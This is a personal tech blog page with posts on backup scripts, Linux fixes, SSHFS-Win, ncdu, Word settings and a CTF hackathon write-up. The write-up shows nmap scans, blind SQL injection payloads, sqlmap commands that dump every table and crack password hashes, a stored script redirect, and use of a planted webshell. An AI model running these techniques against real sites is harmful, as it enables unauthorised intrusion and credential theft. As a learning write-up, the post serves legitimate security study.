Suramya's Blog : Welcome to my crazy life…

November 28, 2020

My Backup strategy and how it has evolved over the years

I am a firm believer in backing up my data. Some people say that I am paranoid about it, and I don't dispute that: all my data is backed up on multiple drives and in multiple locations, and I still feel that I need additional backups. This is because I read the news, and there have been plenty of cases where people lost their data simply because they hadn't backed it up. Initially I wasn't that serious about it, but when I was in college and working at the helpdesk, a PhD student came in crying because her entire PhD thesis was on a Zip drive that had stopped working. She didn't have a backup and was basically screwed. We tried a bunch of things to recover the data but didn't manage to recover anything. That made me realize that I needed a better backup procedure, and so started my journey in creating recoverable backups.

My first backup system was a partition on my drive called "backup" where I kept a copy of all my important data (this was back in 2000/2001). Then I realized that if the drive died I would lose access to the backup partition as well, so I started looking for alternatives. This was around the time I bought a CD writer, so all my important data was backed up to CDs and I was confident that I could recover any lost data. Shortly afterwards I moved to DVDs for easier storage. However, I didn't realize until a lot later that CDs & DVDs can become unreadable surprisingly quickly. Thankfully I didn't lose any data, but it was a rude awakening to find that the disks I had expected to keep my data safe were starting to become unreadable within a few years.

I then did a bunch of research online and found that the best medium for storing data long term is still hard drives. I didn't want to store anything online because I want my data to be in my control, so any online backup system was out of the question. I added multiple drives to my desktop and started syncing the data from the desktop & laptop to the backup drive using rsync. This ensured that the important data was in three locations at any given time: my desktop, my laptop and the backup drive (plus a DVD copy that I made of all my data every year).

I continued with this backup strategy for a few years but then realized that I had no way to go back to a previous version of any given document. If I deleted a file or wanted to go back to an older version, I only had 24 hours before the changes were synced to the backup drive and became unrecoverable. There was a case where I ended up having to dig through my DVD backups to find the original version of a file that I had changed. So I did a bit of research and found rdiff-backup. It backs up one directory to another while keeping incremental history, so you can recover/restore files based on a date or date range. The best part is that the software is highly efficient: once the initial backup is done, it only transmits the changes to the files in subsequent runs. Now that I have been using it for a while, I can restore a snapshot of my data going back to 2012 quite easily.
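As a rough illustration of restoring from the increments (the file paths here are placeholders, not my actual layout), rdiff-backup can pull back a file or directory as it existed at a given point in time:

# Restore a file as it existed on 15 March 2015
rdiff-backup -r 2015-03-15 /mnt/Backup/Snapshots/Documents/notes.txt /tmp/notes-2015-03-15.txt

# Restore the whole directory as it was 10 days ago
rdiff-backup -r 10D /mnt/Backup/Snapshots/Documents /tmp/Documents-10-days-ago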

I was quite happy with this setup for a while, but while reading an article on backup best practices I realized that I was still depending on only one location for the backup data (the rdiff-backup snapshots). The best practices stated that you should also store a copy on an external drive or at an offsite location to prevent viruses/ransomware from deleting your backups. So I bought a 5TB external drive and created an encrypted partition on it to store all my important data. But I was still unhappy, because all of this was still stored at my home: if there was a fire or something similar I would still end up losing the data, even though the external drive was kept in a safe. I still didn't want to store data online, but that was still the best way to ensure I had an offsite backup. I initially thought about setting up a server at my parents' place in Delhi and backing up there, but that didn't work out for various reasons. Plus I didn't want to have to call them and troubleshoot backup issues over the phone.

Around this time I was reading about encrypted partitions and came up with the idea of creating an encrypted container file to store my data and then backing up the container file online. I followed the steps I outlined in my post How to encrypt your Hard-drive in Linux and created the encrypted container. Once that was done I had to upload the container to my webhost, since I had unlimited storage space as per my contract. Initially I wasn't able to because they had restricted my account's quota, but a call to their customer support sorted it out after a bit of arguing and explaining what I was doing. The next hurdle was uploading the file to the server because of the ridiculously low upload speed I was getting from Airtel. I had a 40 Mbps connection at the time but the upload speed was restricted to 1 Mbps because of 'reasons'. After arguing with their support for a while, I was complaining about it at work and one of the folks suggested I check out ACT Internet. I looked at their plans, was quite impressed with the offerings, switched over to ACT and was able to upload the container file quickly and painlessly.

Once the container was uploaded, I had to tackle the next problem: how to update the files in the container without having to upload the entire container to the host every time. I experimented with a few approaches and ended up with the following solution:

1. Mount the remote partition locally using sshfs. I mounted it with the following command (please replace the username and hostname with the correct values before using):

/usr/sbin/runuser -l suramya -c "sshfs -o allow_other username@hostname.com:. /mnt/offsite/"

2. Once the remote partition was mounted locally, I could use the usual commands to open the encrypted container and mount it at another location:

/usr/sbin/cryptsetup luksOpen /mnt/offsite/container/Enc_vol1.img enc --key-file /root/UserKey.dat
mount /dev/mapper/enc /mnt/stash/

In an earlier iteration of the setup I wasn't using a keyfile, so I had to manually enter the password every time I wanted to back up to the offsite location. This meant that the backup ran randomly, as and when I remembered to run the command manually. A few days ago I finally configured it to run automatically after adding the keyfile as a decryption key. (Obviously the keyfile needs to be protected and must not be accessible to others, because it allows anyone to decrypt the data without entering a password.) Now the offsite backup runs once a week while the local backup runs daily, and I still back up the Backup partition to the external drive manually as and when I remember to do so.
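For reference, adding a keyfile as an extra decryption key to an existing LUKS container is a one-liner with cryptsetup. This is a sketch using the paths from the commands above (generate and protect the keyfile however you prefer):

# Generate a random keyfile and lock down its permissions
dd if=/dev/urandom of=/root/UserKey.dat bs=1024 count=4
chmod 0400 /root/UserKey.dat

# Add the keyfile to a free key slot (prompts for an existing passphrase)
cryptsetup luksAddKey /mnt/offsite/container/Enc_vol1.img /root/UserKey.dat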

All in all I was quite happy with my setup, but then while updating the encrypted container a network issue made me believe that my remote container had become corrupted (it wasn't, but I thought it was). At the same time I was fooling around with Microsoft OneDrive and saw that I had 1TB of storage available there since I was an Office 365 subscriber. This gave me the idea of backing up the container to OneDrive in addition to my web host.

I first tried copying the entire container to the drive and hit a limit because the file was too large. So I decided to split the file into 5GB parts and sync them to OneDrive using rclone. After installing rclone, I configured it to connect to OneDrive by issuing the following command and following the on-screen prompts:

rclone config

I then created a folder on OneDrive called container to store the split files and tried uploading a test file using the command:

rclone copy $file OneDrive:container

Where OneDrive is the name of the remote I configured in the previous step. This was successful, so I just needed to create a script that did the following:

1. Update the Container file with the latest backup
2. Split the Container file into 5GB pieces using the following command:

split --verbose -d -b5GB /mnt/repository/Container/Enc_vol1.img /mnt/repository/Container/Enc_vol_

3. Upload the pieces to OneDrive.

for file in /mnt/repository/Container/Enc_vol_*; do  echo "$file";  /usr/bin/rclone copy "$file" OneDrive:container -v &> /tmp/oneDriveSync.log; done

This command uploads the pieces to the drive one at a time and is a bit slow because it maxes out at an upload speed of ~2 Mbps per transfer. If you split the uploads and run multiple copies in parallel you get much better throughput. Keep in mind that if you upload more than about 10 files at a time you will start getting errors about too many open connections, and then you have to wait a few hours before you can upload again. It took a while to upload the chunks, but now my files are stored in yet another location and the system is configured to sync to OneDrive once a month.
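A minimal sketch of the parallel approach using xargs (the 4 parallel transfers here are just an example; keep the count under the connection limit mentioned above):

ls /mnt/repository/Container/Enc_vol_* | sort | xargs -P 4 -I{} /usr/bin/rclone copy {} OneDrive:container -v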

So, as of now my files are backed up as follows:

  • /mnt/Backup: Local Drive. All changes are backed up daily using rdiff-backup
  • /mnt/offsite: Encrypted Container stored online. All changes are backed up weekly using rsync
  • OneDrive: Encrypted Container stored at Microsoft OneDrive. All changes are backed up monthly using rsync
  • External Drive: Encrypted backup stored on an external hard drive using rsync. Changes are backed up manually on an infrequent basis.
  • Laptop: All important files are copied over to the laptop using Unison/rsync manually so that I can access my data while traveling

Finally, I am also considering backing up the snapshot data to Blu-ray discs, but that will take time so I haven't gotten around to it yet.

Since I have this elaborate backup procedure in place, I wasn't too worried when one of my disks died last week, and I was able to continue working without issues or worries about losing data. I still think I can enhance the backups I take, but for now I am good. If you are interested in my backup script, an extract of the code is listed below:

# Logs the result of the previous command and aborts the script if it failed.
# $1 is a human-readable description of the step that just ran.
function check_failure ()
{
	if [ $? -eq 0 ]; then
		logger "INFO: $1 Succeeded"
	else
		logger "FATAL: Execution of $1 failed"
		wall "FATAL: Execution of $1 failed"
		exit 1
	fi
}

###
# Syncing to internal Backup Drive
###

function local_backup ()
{
	export BACKUP_ROOT=/mnt/Backup/Snapshots
	export PARENT_ROOT=/mnt/repository

	logger "INFO: Starting System Backup"

	rdiff-backup -v 5 /mnt/data/Documents/ $BACKUP_ROOT/Documents/
	check_failure "Backing up Documents"

	rdiff-backup -v 5 /mnt/repository/Documents/Jani/ $BACKUP_ROOT/Jani_Documents/
	check_failure "Backing up Jani Documents"

	rdiff-backup -v 5 $PARENT_ROOT/Programs/ $BACKUP_ROOT/Programs/
	check_failure "Backing up Programs"

	..
	..

	logger "INFO: All Backups Completed Successfully."
}

### 
# Syncing to Off-Site Backup location
###

function offsite_backup
{
	export PARENT_ROOT=/mnt/repository

	# First we mount the remote directory to local
	logger "INFO: Mounting External Drive"
	/usr/sbin/runuser -l suramya -c "sshfs -o allow_other username@remotehost:. /mnt/offsite/"
	check_failure "Mounting External Drive"

	# Open the Encrypted Partition
	logger "INFO: Opening Encrypted Partition. Please provide password."
	/usr/sbin/cryptsetup luksOpen /mnt/offsite/container/Enc_vol1.img enc --key-file /root/keyfile1
	check_failure "Mounting Encrypted Partition Part 1"

	# Mount the device
	logger "INFO: Mounting the drive"
	mount /dev/mapper/enc /mnt/stash/
	check_failure "Mounting Encrypted Partition Part 2"

	logger "INFO: Starting System Backup"
	rsync -avz --delete  /mnt/data/Documents /mnt/stash/
	check_failure "Backing up Documents offsite"
	rsync -avz --delete /mnt/repository/Documents/Jani/ /mnt/stash/Jani_Documents/
	check_failure "Backing up Jani Documents offsite"
	..
	..
	..

	umount /mnt/stash/
	/usr/sbin/cryptsetup luksClose enc
	umount /mnt/offsite/

	logger "INFO: Offsite Backup Completed"
}

This is how I make sure my data is backed up. All of Jani's data is also backed up to my system using robocopy, as she is running Windows, and from there it gets backed up by the scripts I explained above as usual. I also back up my website/blog/databases, but that's done using a separate, simpler script. Let me know if you are interested and I will share that as well.

This is all for now. Let me know if you have any questions about the backup strategy or if you want to make fun of me. 🙂 Will write more later.

– Suramya

September 30, 2020

How to fix vlc’s Core dumping issue while playing some videos

Over the past two days I found that the VLC install on my computer was suddenly having issues playing some of the video files on my system. Initially I thought it was a problem with the video file, then I realized that it was also happening with videos that had been playing fine earlier. When I ran vlc from the command line to play a problem video, it gave the following output when it crashed:

[00005587b42751b0] dummy interface: using the dummy interface module…
[00007f00c4004980] egl_x11 gl error: cannot select OpenGL API
[00007f00c4004980] gl gl: Initialized libplacebo v2.72.0 (API v72)
[00007f00c402a310] postproc filter error: Unsupported input chroma (VAOP)
[00007f00bd986e50] chain filter error: Too high level of recursion (3)
[00007f00c4028d40] main filter error: Failed to create video converter
[00007f00bd986e50] chain filter error: Too high level of recursion (3)
[00007f00c4028d40] main filter error: Failed to create video converter
[00007f00bd986e50] chain filter error: Too high level of recursion (3)
[00007f00c4028d40] main filter error: Failed to create video converter
[00007f00bd986e50] chain filter error: Too high level of recursion (3)


[00007f00c44265c0] chain filter error: Too high level of recursion (3)
[00007f00c4414240] main filter error: Failed to create video converter
[00007f00bd9020d0] main filter error: Failed to create video converter
[00007f00cc047d70] main video output error: Failed to create video converter
[00007f00cc047d70] main video output error: Failed to compensate for the format changes, removing all filters
[00007f00c4004980] gl gl: Initialized libplacebo v2.72.0 (API v72)

A Google search told me that a possible solution was to disable hardware acceleration in the video settings, but that didn't fix my problem. So I took a look at the kernel.log file in /var/log and found the following error logged when the program crashed:

Sep 30 21:11:44 StarKnight kernel: [173399.132554] vlc[91472]: segfault at 28000000204 ip 00007f2d8916c1d8 sp 00007f2d8aa69db0 error 4 in libpostproc.so.55.7.100[7f2d8915c000+1d000]
Sep 30 21:11:44 StarKnight kernel: [173399.132568] Code: 98 48 8d 44 07 20 0f 18 08 8b 44 24 08 4d 8d 0c 1a 4d 8d 04 2b 85 c0 0f 85 cb fd ff ff 4c 8b 6c 24 28 4b 8d 04 29 4b 8d 14 20 <41> 0f 6f 01 43 0f 6f 0c 29 41 0f 7f 00 43 0f 7f 0c 20 43 0f 6f 04

I spent about an hour searching for a solution using the details from kernel.log but got nowhere. Finally I found a forum post where one of the suggested solutions was to remove the VLC configuration files. Since I didn't have any other bright ideas, I renamed the VLC config folder by issuing the following command:

mv ~/.config/vlc ~/.config/vlc_09302020

Then I started vlc and just like that everything started working again. 🙂 Not sure what caused the settings to get borked in the first place but the issue is fixed now so all is well.

– Suramya

September 29, 2020

Mounting a Network drive over ssh in Windows using WinFsp & SSHFS-Win

I have computers running both Windows & Linux, and at times I need to share files between them. I have been looking for a convenient way to access files on my Linux machine from my Windows machine without having to run Samba on the Linux box, because historically Samba has been a security nightmare and I don't want to run extra services on the computer if I can avoid it. Earlier this week I finally found a way to mount my Linux directories on Windows as a network mount over SSH using WinFsp & SSHFS-Win, and I have been running it for a couple of days so far without any issues. (So far.)

Follow these steps to enable SSHFS-Win on your windows machine:

Install WinFsp (Windows File System Proxy)

WinFsp is a set of software components for Windows that allows the creation of user-mode file systems, similar to FUSE (Filesystem in Userspace) in the Unix/Linux world. You can download it from the project's Git repository; the installation file is available via the download link under 'Releases' near the top right corner of the page. The latest version is WinFsp 2020.1 at the time of this writing.

Install the software by running the MSI file you downloaded; the default options worked for me without modification.

Install SSHFS For Windows

SSHFS-Win is a minimal port of SSHFS to Windows. It is available for download from the project’s Git repository. You can compile from source or download the installation file by clicking on the download link under ‘Releases’ near the top right corner of the page. The latest version is SSHFS-Win 2020 at the time of this writing.

Please note that you will need to have WinFsp installed already before you can install SSHFS-Win successfully.

Usage:

Once you have installed both packages you can start using them and map a network drive to a remote directory using Windows Explorer or the net use command. Usage instructions are below (taken from the project documentation):

In Windows Explorer select This PC > Map Network Drive and enter the desired drive letter and SSHFS path using the following UNC syntax:

\\sshfs\REMUSER@HOST[\PATH]

The first time you map a particular SSHFS path you will be prompted for the SSH username and password, which can be saved using the Windows Credential Manager so that you don't get prompted again. To unmap the drive, right-click on the drive icon in Windows Explorer and select Disconnect.


Visual demo of how to Map a Network drive using SSHFS-Win

You can map a network drive from the command line as well using the net use command:

net use X: \\sshfs\suramya@StarKnight

You will then be prompted for the password and once you authenticate you can use the new drive as usual. You can unmap the drive as follows:

net use X: /delete
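Based on the UNC syntax above you can also point the drive at a specific directory under the remote home directory rather than the home directory itself; for example (the path here is just an illustration):

net use Y: \\sshfs\suramya@StarKnight\Documents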

I find this quite useful and hope you do as well.

Thanks to MakerLab, Department of Computer Science, HKU for pointing me in the correct direction

– Suramya

September 27, 2020

Using ncdu to Check Disk Space Usage In Linux

One of the common tasks I face on my Linux systems is identifying which files/directories are using the most space. The traditional way to find out is to go to the top-level directory, run 'du -hs *' (without the quotes), then cd into each directory, rinse and repeat. The other option is to right-click a folder in Dolphin (or any other file manager), select Properties, and then repeat the same process for each subdirectory individually. Both approaches are tedious and time consuming.

Instead you can use ncdu (NCurses Disk Usage) to look at the storage space utilization on your computer, and it has a lot of advantages. It is designed to find space hogs on a remote server where you don't have a full graphical environment available. It is fast, simple and very easy to use. I have been using it for a while now and absolutely love it.

To Install ncdu on a Debian system, you can issue the following command:

apt-get install ncdu

Once you have it installed, the usage it very simple. Simply open a command prompt and issue the following command:

ncdu

It starts in the current directory and indexes all the sub-directories under it. The initial scan can take a while depending on the size of the directories under the current one, but it's comparable to the time taken by running du -hs on the same directory. Once the program completes its scan, you get a simple ncurses-based interface that you can navigate using the keyboard.


ncdu display for my home directory

All directories & files are listed with their sizes in human-readable format, sorted by size with the largest entries at the top (in the default view). You can go into a directory by selecting it and hitting Enter; the sizes of its subdirectories are shown immediately without having to run additional commands. You can also delete directories & files from within ncdu by hitting the delete key, which is a huge timesaver.
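If you want to scan a specific directory instead of the current one, or keep ncdu from crossing into other mounted filesystems, you can pass the path and the -x flag (the path is just an example):

ncdu -x /home/suramya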

If you haven’t tried it out do check it out. You will love it.

– Suramya

August 30, 2020

How to write using inclusive language with the help of Microsoft Word

Filed under: Computer Software,Knowledgebase,My Thoughts,Tech Related — Suramya @ 11:59 PM

One of the key aspects of inclusion is inclusive language, and it's very easy to use non-inclusive/gender-specific language in our everyday writing. For example, when you meet a mixed-gender group of people almost everyone will say something to the effect of 'Hey Guys'. I was guilty of the same, and it took a concentrated effort on my part to change my greeting to 'Hey Folks' and make other similar changes. It's the same with written communication, where most people default to male-gender-focused writing. Recently I found out that Microsoft Office's correction tools, which most people associate with bad grammar or improper verb usage, quietly include options that help catch non-inclusive language, including gender and sexuality bias. So I wanted to share that with everyone.

Below are instructions on how to find & enable the settings:

  • Open MS Word
  • Click on File -> Options
  • Select ‘Proofing’ from the menu in the left corner and then scroll down on the right side to ‘Writing Style’ and click on the ‘Settings’ button.
  • Scroll down to the “Inclusiveness” section, select all of the checkboxes that you want Word to check for in your documents, and click the “OK” button. In some versions of Word you will need to scroll down to the ‘Inclusive Language’ section (its all the way near the bottom) and check the ‘Gender-Specific Language’ box instead.
  • Click Ok

It doesn't sound like a big deal when you refer to someone by the wrong gender, but trust me, it is. If you don't believe me, try addressing a group of men as 'Hello Ladies' and then wait for the reactions. If you can't address a group of guys as ladies, then you shouldn't refer to a group of ladies as guys either. I think it is common courtesy and requires minimal effort over the long term (initially things will feel a bit awkward, but then you get used to it).

Well this is all for now. Will write more later.

– Suramya

August 24, 2018

Fixing the appstreamcli error when running apt-get update

Filed under: Computer Software,Knowledgebase,Linux/Unix Related,Tech Related — Suramya @ 12:05 AM

Over the past few days, every time I tried to update my Debian system using apt-get it would fail with the following error message:

(appstreamcli:5574): GLib-CRITICAL **: 20:49:46.436: g_variant_builder_end: assertion '!GVSB(builder)->uniform_item_types || 
GVSB(builder)->prev_item_type != NULL || g_variant_type_is_definite (GVSB(builder)->type)' failed

(appstreamcli:5574): GLib-CRITICAL **: 20:49:46.436: g_variant_new_variant: assertion 'value != NULL' failed

(appstreamcli:5574): GLib-ERROR **: 20:49:46.436: g_variant_new_parsed: 11-13:invalid GVariant format string
Trace/breakpoint trap
Reading package lists... Done
E: Problem executing scripts APT::Update::Post-Invoke-Success 'if /usr/bin/test -w /var/cache/app-info -a -e /usr/bin/appstreamcli; then appstreamcli refresh-cache > 
/dev/null; fi'
E: Sub-process returned an error code

I spent a couple of hours trying to figure out what was causing it and was able to identify that it was caused by a bug in appstream, as running the command manually also failed with the same error. When I tried to remove the package, as recommended by a few sites, it would have removed the entire KDE desktop from my machine, which I didn't want, so I was at a loss as to how to fix the problem. I put the update on hold till I had a bit more time to research the issue and identify a solution.

Today I got some free time and decided to try again, and after a little bit of searching stumbled upon Bug Report #906544, where David explained that the error was caused by a bug in the upstream version of appstream, and a little while later Matthias commented that the issue was fixed in the latest version of the software and would flow down to the Debian repositories shortly. Normally I would have just done an apt-get update and then installed the fixed package, but since the whole issue was that I couldn't get the update command to finish, I had to install the package manually.

To do that I went to the Debian site and opened the software package list for Debian Unstable (as that is what I am running) and searched for appstream. This gave me a link to the updated package (0.12.2-2) that fixed the bug (I had 0.12.2-1 installed). Once I downloaded the package (make sure you download the correct package for your system architecture), I manually installed it by running the following command as root:

dpkg -i appstream_0.12.2-2_amd64.deb

This installed the package and I was then able to do an apt-get update successfully. I still get the GLib-CRITICAL warnings, but apparently they can be ignored without issues.
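As an aside, if you are ever unsure which architecture package to download, dpkg will tell you what the system is running (it prints e.g. amd64):

dpkg --print-architecture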

Hope this helps people who hit the same issue (or reminds me of the solution if/when I hit the issue again).

– Suramya

February 7, 2018

Hacking the Brainwaves Cyber Security CTF Hackathon 2018

Earlier this year I took part in the Brainwaves Cyber Security Hackathon 2018 with Disha Agarwala and it was a great experience. We both learnt a lot from the hackathon, and in this post I will talk about how we approached the problems and some of our learnings from the session.

Questions we had to answer/solve in the Hackathon:

  • Find the Webserver’s version and the Operating system on the box
  • Find what processes are running on the server?
  • What fuzzy port is the SSH server running on?
  • Discover the site architecture and layout.
  • Describe the major vulnerability in the home page of the given website based on OWASP TOP 10. Portal Url: https://socgen-ctf.0x10.info
  • Gain access to member area and admin area through blind SQL, or session management.
  • Dump all user accounts from member area. [SQLi]
  • [Broken Validation] Demonstrate how you can modify the limit in order management.
  • [Open Redirect] Redirect site/page to hackerearth.com
  • List any other common bugs you came across while on the site
  • After logging into the member area, perform the following functions:
    • Find the master hash & crack it
    • Dump all users
    • Find the email ID and password of saved users

Information Gathering:

In order to find the services running on the server, the first thing we had to do was find the IP/hostname of the actual server hosting the site, which was a bit tricky because the URL provided was protected by CloudFlare. So any scans of socgen-ctf.0x10.info took us to the CloudFlare proxy server instead of the actual server, which was a problem.

We figured this out by trying to access the IP address that socgen-ctf.0x10.info translated to in the browser.

suramya@gallifrey:~$ host socgen-ctf.0x10.info 
socgen-ctf.0x10.info has address 104.28.15.64 

Since the site homepage didn't do anything except display text that refreshed every 15 seconds, we needed to find other pages on the site to give us an attack surface. We checked whether the site had a robots.txt (it tells web crawlers not to index certain directories). These directories usually contain sensitive data, and in this case the file existed with the following contents:

# robots.txt
Sitemap: http://socgen-ctf.0x10.info/sitemap.xml
User-agent: *
Disallow: images
Disallow: /common/
Disallow: /cgi-bin/

The images directory didn't have any interesting files in it, but the /common/ directory had a file named embed.php which basically ran a PHP info dump. This dump has a lot of information that can be used to attack the site, but the main item we found here was the IP address of the actual server where the services were running (38.109.218.93).

Using this information we were able to initiate an nmap scan to identify the services running on the host. The nmap command that gave us all the information we needed was:

nmap -sV -O -sS -T4 -p 1-65535 -v 38.109.218.93

This gave us the following result set after a really really long run time:

PORT     STATE    SERVICE       VERSION
23/tcp   filtered telnet
25/tcp   open     smtp?
80/tcp   open     http          This is not* a web server, look for ssh banner
81/tcp   open     http          nginx 1.4.6 (Ubuntu)
82/tcp   open     http          nginx 1.4.6 (Ubuntu)
137/tcp  filtered netbios-ns
138/tcp  filtered netbios-dgm
139/tcp  filtered netbios-ssn
445/tcp  filtered microsoft-ds
497/tcp  filtered retrospect
1024/tcp open     kdm?
1720/tcp open     h323q931?
2220/tcp open     ssh           OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.8 (Ubuntu Linux; protocol 2.0)
2376/tcp open     ssl/docker?
3380/tcp open     sns-channels?
3389/tcp open     ms-wbt-server xrdp
5060/tcp filtered sip
5554/tcp filtered sgi-esphttp
8000/tcp open     http          nginx 1.4.6 (Ubuntu)
8080/tcp open     http          Jetty 9.4.z-SNAPSHOT
8086/tcp open     http          nginx 1.10.3 (Ubuntu)
9090/tcp open     http          Transmission BitTorrent management httpd (unauthorized)
9996/tcp filtered palace-5
19733/tcp filtered unknown
25222/tcp filtered unknown
30316/tcp filtered unknown
33389/tcp open     ms-wbt-server xrdp
33465/tcp filtered unknown
34532/tcp filtered unknown
35761/tcp filtered unknown
35812/tcp filtered unknown
35951/tcp filtered unknown
37679/tcp filtered unknown
38289/tcp filtered unknown
38405/tcp filtered unknown
38995/tcp filtered unknown
40314/tcp filtered unknown
44194/tcp filtered unknown
47808/tcp filtered bacnet

For some reason the results from the nmap scan varied between runs, so we had to run the scan multiple times to get all the services on the host. This was possibly because the server was set up to make automated scanning more difficult.

Once we identified the port the SSH server was running on (2220), we were able to connect to it, and the banner gave us the exact OS details of the server. We already knew from the PHP info dump that the server was running Ubuntu, along with the kernel version, but this gave us the exact release.

Discovering Site architecture:

Since we had to discover the URLs to the members & admin areas before we could attack them, we used dirb, a web content scanner, to get a list of all the public directories/files on the site. This gave us the URLs to several interesting files and directories. One of the files identified by dirb was https://socgen-ctf.0x10.info/sitemap.xml. When we visited the link it gave us a list of other URLs of interest on the site (we had to replace the hostname with socgen-ctf.0x10.info), including the members area (http://socgen-ctf.0x10.info/members.php?p=login) and siteadmin (http://socgen-ctf.0x10.info/siteadmin).

After a long and fruitless effort to use SQL injection on the siteadmin area, we started to explore the other files/URLs identified by dirb. This gave us a whole bunch of files/data that seemed to be left over from other hackathons, so we ignored them.

SQL Injection

The main site https://socgen-ctf.0x10.info/index.php?p=. appeared to be vulnerable to SQL injection at first glance, because when we visited https://socgen-ctf.0x10.info/index.php?p=.' (note the trailing single quote) it reloaded the page. This meant that we could inject queries into it, but since it didn't display a true or false result on the page, a straightforward SQL injection wasn't possible. (We could have tried a blind injection, but that would have required a lot of effort for a non-guaranteed result.)

As we explored the remaining URLs in sitemap.xml, one of the links (https://socgen-ctf.0x10.info/embedframe.php) was interesting as it appeared to give a dump of data being read from the site DB. Opening the page while watching the developer toolbar for network traffic identified a URL that appeared to be vulnerable to SQL injection (https://socgen-ctf.0x10.info/ajax.php?cid=&p=view_channel&id=28), and once we tested the URL we found that the id parameter was indeed injectable.

We used blind SQL injection to gain access by executing true and false statements and seeing that they returned different results (a true condition displays '1' on the webpage, a false one displays '0'). We checked whether a UNION query ran on the site, which it did, and using other queries we identified the backend to be a MySQL database (5.x version). Then we found the table name (members), which was an easy guess since the website had an add-customer field. After identifying the number of columns in the table we got stuck, because any statements to list the available tables or extract data failed with an error about inconsistent column numbers.
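To illustrate the approach, the boolean-based payloads we sent against the id parameter looked along these lines (generic examples, not the exact strings we used):

ajax.php?cid=&p=view_channel&id=28 AND 1=1    (true condition: page renders '1')
ajax.php?cid=&p=view_channel&id=28 AND 1=2    (false condition: page renders '0')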

Finally, we ran sqlmap, an open-source tool for automating SQL injection. It took us a few tries to get the software running because initially every attempt to scan the site was rejected with a 403 error. It turned out that the connections were being rejected because the site didn't like the user agent the software was sending by default, and adding a flag to randomize the user agent resolved the permission-denied issue.

Once the scan ran successfully we tried to get access to the MySQL user table, but that failed because the user we were authenticating as didn't have access to the required table.

sqlmap -u 'https://socgen-ctf.0x10.info/ajax.php?cid=&p=view_channel&id=28' --random-agent -p id --passwords

So we then tried getting an interactive shell and an out-of-band (OOB) shell, both of which failed. We finally ran the command to do a full dump of everything that the system allowed us to export via SQL injection using sqlmap. This included the DB schema, the table schemas and a dump of every table on the database server which the MySQL user had access to. The command we used was the following:

sqlmap -u 'https://socgen-ctf.0x10.info/ajax.php?cid=&p=view_channel&id=28' --random-agent -p id  --all --threads 3

This gave us a full dump of all the tables, and the software was helpful enough to identify password hashes where they existed and offered to attempt to crack them as well. In this case the passwords were stored as basic unsalted MD5 hashes, which were cracked quite easily, giving us the passwords for the first two accounts in the database (admin & demo).

Looking at the rest of the entries in the users table, we noticed that they all had funny values in the email address field; instead of a regular email address we had entries that looked like the following:

,,,"0000-00-00 00:00:[email protected]509a6f75849b",1
,1,RU,

As we had no clue what this was about, the first thing we attempted was to access the https://socgen-ctf.0x10.info/cdn-cgi/l/email-protection URL. It gave us a message explaining that the email addresses in the DB were obfuscated by CloudFlare to protect them from bots. A quick Google search gave us a 21-line Python script, which we tweaked to convert all the hashes back into email addresses and passwords. (The code is listed below for reference.)

#! /usr/bin/env python
# -*- coding: utf-8 -*-
# vim:fenc=utf-8
#
# Copyright © 2016 xl7dev
# Distributed under terms of the MIT license.

"""
Decode a CloudFlare-obfuscated email string passed as the first argument.
"""
import sys

fp = sys.argv[1]

def deCFEmail():
    # The first hex byte is the XOR key; every following byte is XORed
    # with it to recover the original character.
    r = int(fp[:2], 16)
    email = ''.join([chr(int(fp[i:i+2], 16) ^ r) for i in range(2, len(fp), 2)])
    print(email)

if __name__ == "__main__":
    deCFEmail()
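Saved as deCFEmail.py (the filename is arbitrary), the script takes the obfuscated hex string as its only argument:

python deCFEmail.py <obfuscated-hex-string>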

This gave us the email addresses and passwords for all the users on the site. Since the accounts appeared to be created by SQL injection a bunch of them didn’t have any passwords but the remaining were valid accounts for the most part and we verified a couple by logging in manually with the credentials.

OWASP TOP 10 Vulnerability

To find the vulnerabilities in the home page we tried various manual techniques at first but drew a blank, so we decided to use OWASP ZAP. This tool lets you automatically scan a given URL for vulnerabilities, along with a whole lot of other things.

At first the scan failed because of the same user-agent issue as earlier. This time we took a different approach to resolve it by configuring OWASP ZAP as a proxy server and pointing Firefox at it for all traffic. This got the site showing up in the tool, and we were then able to trigger both an active scan and a spider scan of the site.

This gave us detailed reports that highlighted various issues in the site which we submitted.

Redirecting HomePage

The redirection of the home page was quite simple. We found that we could insert a customer name containing JavaScript tags, so we inserted a record whose name was a script tag that redirected the browser to hackerearth.com, and the system automatically redirected the page whenever the Customer list section was accessed.

Other Interesting Finds

The nmap scan told us that in addition to port 80, web servers were listening on ports 81, 82, 8000, 8080 and 8086.

Ports 82, 8000 and 8086 were running standard installs of nginx and we didn't find much of interest on them, even after running dirb against each. Port 8080 appeared to be running a proxy or a Jenkins instance.

Port 81 was the most interesting because it was running an nginx server that responded to any query with a 403 error. When we tried accessing the site via the browser we got an error about corrupted content.

We were unable to identify what the purpose of this site was but it was interesting.

SSH Banner / PHP Shell

The web server instance running on port 80 had its version string set to the following text: "This is not* a web server, look for ssh banner Server at private-tunel.wehostservers.ru Port 80", so we went back and investigated the SSH banner from the SSH server on port 2220. The banner was encoded, and to decode it we repeatedly converted the ciphertext from hex to ASCII. It gave us the following results on each conversion:

3333333733333333333333373333333333333336333333383333333233333330333333363333333233333336333333313333333633363335333333363336333533333336333333353
3333337333333323333333233333330333333363333333633333336333633363333333733333332333333373333333733333336333333313333333733333332333333363333333433333332333333303333
3337333333333333333633363333333333363333333133333337333333333333333633333338333333323333333033333336333333333333333633363336333333373333333533333336333633333333333
63333333433333332333333303333333633363333333333363333333533333336333333313333333633333334333733393336363633373335373436663230363132307368336c6c2e706870

3337333333373333333633383332333033363332333633313336363533363635333633353337333233323330333633363336363633373332333733373336333133373332333633343332333033373333333
636333336333133373333333633383332333033363333333636363337333533363633333633343332333033363633333633353336333133363334373936663735746f206120sh3ll.php
 37333733363832303632363136653665363537323230363636663732373736313732363432303733366336313733363832303633366637353663363432303663363536313634796f75to a #

ssh banner forward slash could lead you to a #sh3ll.php

Once we got the fully decoded text we knew that there was a potential webshell on the server, but it wasn't apparent where the shell was located. After some hit-and-trial failed, we turned back to our old faithful dirb to see if it could find the shell.

dirb allows us to specify a custom word list, which it iterates through to build candidate paths, and we can also append an extension to each word. So we created a file called test with the following content:

suramya@gallifrey:~$ cat test 
shell
sh3ll
sh311

and then ran the following command:

suramya@gallifrey:~$ dirb https://socgen-ctf.0x10.info/ test  -X '.php'

This gave us the location of the shell.


Accessing the link gave us a page with a message “you found a shell, try pinging google via sh3ll.php?exec=ping 8.8.8.8”

Accessing the URL with the additional parameter gave us a page with the output of the ping command, which confirmed that we had command execution on the server through the shell.

